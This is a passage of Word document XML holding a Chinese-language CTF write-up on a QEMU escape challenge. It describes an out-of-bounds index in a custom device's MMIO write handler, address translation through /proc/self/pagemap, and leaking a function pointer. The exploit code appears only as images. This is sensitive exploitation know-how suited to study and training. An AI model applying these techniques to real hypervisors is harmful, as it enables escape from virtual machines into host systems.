      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004B67A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B67A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&gt;0x7f时，函数限制size为8；反之，限制size为</w:t>
      </w:r>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r w:rsidR="004B67A9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA96A49" w14:textId="69077D29" w:rsidR="00754E56" w:rsidRDefault="004B67A9" w:rsidP="001A342A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A342A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A7AC672" wp14:editId="1BC5320C">
            <wp:extent cx="4853606" cy="1941443"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1905"/>
            <wp:docPr id="21411976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197622" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId14"/>
                    <a:srcRect r="5778" b="10045"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4858949" cy="1943580"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="284CF984" w14:textId="77777777" w:rsidR="004E4569" w:rsidRDefault="007D3C41" w:rsidP="001A342A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">在这之后，write函数监听了 0x28, 0x48, 0x88, 0x90, 0x98 这几个地址，分别用于设置 State 对象的 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">, flag, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="004E4569">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E4569">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>idx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E4569">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 字段，以及触发</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E4569">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E4569">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据交换。例如，设置flag字段的逻辑如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E98421C" w14:textId="2C0CF813" w:rsidR="004E4569" w:rsidRDefault="004E4569" w:rsidP="00C8368D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E4569">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C9D9EF4" wp14:editId="73B07305">
            <wp:extent cx="1212574" cy="554467"/>
            <wp:effectExtent l="0" t="0" r="6985" b="0"/>
            <wp:docPr id="31611392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34086" cy="564304"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF584EC" w14:textId="168B9390" w:rsidR="004E4569" w:rsidRPr="007D3C41" w:rsidRDefault="004E4569" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对照驱动的逻辑，可以在exp中实现如下设置字段的util 函数。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64635107" w14:textId="656EBFEE" w:rsidR="00754E56" w:rsidRDefault="004E4569" w:rsidP="001A342A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64C5F5AF" wp14:editId="0241FB25">
            <wp:extent cx="2332382" cy="3191681"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="2140562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56204" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2360547" cy="3230222"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="59FE68E6" w14:textId="46B1CC08" w:rsidR="004E5C0E" w:rsidRDefault="001A342A" w:rsidP="001A342A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>mmio_</w:t>
      </w:r>
      <w:r w:rsidR="004E4569">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E4569">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数的漏洞点在0x98地址处</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1580C1DE" w14:textId="195925C5" w:rsidR="004E5C0E" w:rsidRDefault="004E5C0E" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E5C0E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C0AA8D9" wp14:editId="244618C7">
            <wp:extent cx="5274310" cy="2461895"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="174230062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461895"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1C7CDE" w14:textId="21E79A00" w:rsidR="00CA1641" w:rsidRDefault="004E4569" w:rsidP="001A342A">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在该地址</w:t>
      </w:r>
      <w:r w:rsidR="004E5C0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>驱动调用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cpu_physical_memory_rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 向 opaque-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[opaque-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>idx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>] 位置读取或写入数据，</w:t>
      </w:r>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>数据的</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>长度位</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为 opaque-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="004E5C0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>但</w:t>
      </w:r>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这里没有对</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004E5C0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进行越界</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidR="004E5C0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，可以读取State中buffer后面的字段。</w:t>
      </w:r>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>并且，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cpu_memory_rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的第一个参数是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">内部guest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 的地址</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>gpa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。exp程序可以通过直接读取/proc/self/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>pagemap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>文件，将c程序的指针转换为物理地址，进而用指针的物理地址作为第一个参数填充到 opaque-&gt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>中，实现从exp到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进程</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00AD1836">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>hva</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AD1836">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>空间的读写</w:t>
      </w:r>
      <w:r w:rsidR="001A342A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09017459" w14:textId="54289CB5" w:rsidR="00AD1836" w:rsidRDefault="00AD1836" w:rsidP="00AD1836">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在exp中实现了如下的函数，利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cpu_physical_memory_rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>读取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的值到 exp进程的变量中。类似地，也可以实现将exp的变量值写入到</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的exp代码，没有放出。这里比较tricky的点是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cpu_physical_memory_rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 是从</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">的视角出发去看guest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">，而exp中的函数是从 guest </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 内部出发去看</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>qemu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>进程，二者的方向是相反的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3147A5" w14:textId="49D8F4E5" w:rsidR="00AD1836" w:rsidRDefault="00AD1836" w:rsidP="00AD1836">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1836">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C319579" wp14:editId="4F5E228F">
            <wp:extent cx="5049394" cy="1583635"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="14437399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62159" cy="1587638"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E28CDF7" w14:textId="77777777" w:rsidR="004E5C0E" w:rsidRPr="001A342A" w:rsidRDefault="004E5C0E" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D4985BC" w14:textId="2434CC88" w:rsidR="004E5C0E" w:rsidRDefault="00AD1836" w:rsidP="004E5C0E">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>泄露</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="004E5C0E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cpu_physical_memory_rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE1D845" w14:textId="26995E07" w:rsidR="00AD1836" w:rsidRPr="00AD1836" w:rsidRDefault="00AD1836" w:rsidP="000E36D1">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:ind w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>sjtuctfState</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">结构体中，函数指针p放置在 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的后面。因此，可以利用上述</w:t>
      </w:r>
      <w:r w:rsidR="000E36D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>函数，读取</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>dma_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>[0x1020] 来泄露p的值</w:t>
      </w:r>
      <w:r w:rsidR="000E36D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，此时p指向</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>cpu_physical_memory_rw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000E36D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9F8AAF" w14:textId="505B411E" w:rsidR="00CA1641" w:rsidRDefault="000E36D1" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1836">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="57DDEA33" wp14:editId="7BCA4A0A">
            <wp:extent cx="5274310" cy="1301115"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="48240594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1301115"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F345F03" w14:textId="2D5B837F" w:rsidR="00CA1641" w:rsidRDefault="000E36D1" w:rsidP="00EC2735">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
